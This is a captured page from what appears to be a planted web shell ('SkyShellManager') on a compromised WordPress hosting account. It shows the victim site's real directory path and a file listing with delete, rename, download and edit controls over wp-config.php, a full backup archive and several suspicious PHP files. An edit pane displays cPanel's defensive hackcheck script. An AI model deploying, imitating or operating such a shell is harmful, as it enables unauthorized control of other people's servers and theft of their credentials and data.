ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ

📁 ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ PHP v8.3.31

Path:root/home4/cvysxmmy/public_html/barriecorewellness.ca/

Name	Size	Perm	Actions
📁 .well-known	-	0755	🗑️ 🏷️
📁 blogs	-	0755	🗑️ 🏷️
📁 css	-	0755	🗑️ 🏷️
📁 img	-	0000	🗑️ 🏷️
📁 mt_images	-	0755	🗑️ 🏷️
📁 test	-	0755	🗑️ 🏷️
📁 tmp	-	0755	🗑️ 🏷️
📁 wp-admin	-	0755	🗑️ 🏷️
📁 wp-content	-	0755	🗑️ 🏷️
📁 wp-includes	-	0755	🗑️ 🏷️
📄 .htaccess	2 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 .htaccess.phpupgrader.21100a0f	0.79 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 .htaccess.phpupgrader.initial	0.79 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 LEGGIMI.txt	0.39 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 backup-barriecore_dreamstoreality_ca-2014_03_24-full-mf6zx4edh7.zip	46075.72 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 error_log	333623.45 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 favicon.ico	17.13 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 importbuddy.php	2412.95 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 index (1).php	12.15 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 index.php	23 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 licencia.txt	17.51 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 licens-sv_SE.txt	13.95 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 licens.html	22.61 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 license.txt	19.44 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 licenza.html	24.3 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 liesmich.html	8.53 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 lisenssi.html	21.29 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 readme-ja.html	3.01 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 readme.html	7.25 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 robots.txt	0.1 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 seiso.php	53.35 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 ss.php	12.48 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-activate.php	7.18 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-blog-header.php	0.5 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-cli.yml	0.03 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-comments-post.php	2.27 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-config-sample.php	3.26 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-config.php	3.59 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-cron.php	5.49 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-links-opml.php	2.43 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-load.php	4 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-login.php	50.23 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-mail.php	8.52 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-settings.php	30.33 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-signup.php	33.71 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 wp-trackback.php	5.09 KB	0644	🗑️ 🏷️ ⬇️ ✏️
📄 xjq.txt	0 KB	0000	🗑️ 🏷️ ⬇️ ✏️
📄 xmlrpc.php	3.13 KB	0644	🗑️ 🏷️ ⬇️ ✏️

Edit: hackcheck

#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/hackcheck                       Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

use Cpanel::Rand                 ();
use Cpanel::FileUtils::TouchFile ();
use Cpanel::SafeDir::MK          ();

$| = 1;

my $tmpdir    = Cpanel::Rand::gettmpdir();    # audit case 46806 ok
my $is_hacked = '';
if ( -d $tmpdir ) {
    foreach my $num ( 0 .. 9 ) {
        Cpanel::FileUtils::TouchFile::touchfile("$tmpdir/$num");
        if ( !-f "$tmpdir/$num" ) {
            $is_hacked = "Could not create file $tmpdir/$num: $!";
            last;
        }
        elsif ( !unlink("$tmpdir/$num") ) {
            $is_hacked = "Could not remove file $tmpdir/$num: $!";
            last;
        }
        Cpanel::SafeDir::MK::safemkdir("$tmpdir/$num");
        if ( !-d "$tmpdir/$num" ) {
            $is_hacked = "Could not create directory $tmpdir/$num: $!";
            last;
        }
        elsif ( !rmdir("$tmpdir/$num") ) {
            $is_hacked = "Could not remove directory $tmpdir/$num: $!";
            last;
        }
    }
    if ( !$is_hacked ) {
        if ( !rmdir($tmpdir) ) {
            $is_hacked = "Could not remove directory $tmpdir: $!";
        }
    }
}
else {    # Can't make random directory in /tmp
    $is_hacked = "Failed to create directory $tmpdir: $!";
}

my $msg = <<"EOM";
Attempts to create new directories or files whose filenames begin with numbers have failed.
This is indicative of a root compromise of the server.

The exact error encountered was:

$is_hacked

EOM

if ($is_hacked) {
    print "[hackcheck] Possible rootkit detected\n$msg";

require Cpanel::Notify;
    Cpanel::Notify::notification_class(
        'class'            => 'Check::Hack',
        'application'      => 'Check::Hack',
        'constructor_args' => [
            'origin' => 'hackcheck',
            'reason' => $is_hacked
        ]
    );
}

exit if -e '/etc/disablehackcheck';

foreach my $account (qw(xfs daemon)) {
    my @pwnam = getpwnam($account);
    next if !$pwnam[0];
    if ( $pwnam[1] !~ m{^[\!\*]} ) {
        system( "/usr/bin/passwd", "-l", $account );
    }
}

my ( $user, $uid );
open( my $passwd, '<', "/etc/passwd" );
while (<$passwd>) {
    next if (m/^\#/);
    ( $user, undef, $uid, undef ) = split( /:/, $_, 3 );
    next if ( !defined $uid );
    if ( $uid == 0 && $user ne "root" && $user ne "toor" ) {
        system( '/usr/bin/passwd', '-l', $user );
        print "[hackcheck] $user has a uid 0 account (root access).\n";

require Cpanel::Notify;
        Cpanel::Notify::notification_class(
            'class'            => 'Check::Hack',
            'application'      => 'Check::Hack',
            'constructor_args' => [
                'origin'          => 'hackcheck',
                'suspicious_user' => $user
            ]
        );
    }
}
close($passwd);

📁 ＳＫＹＳＨＥＬＬ ＭＡＮＡＧＥＲ PHP v8.3.31

Edit: hackcheck

📁 ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ PHP v8.3.31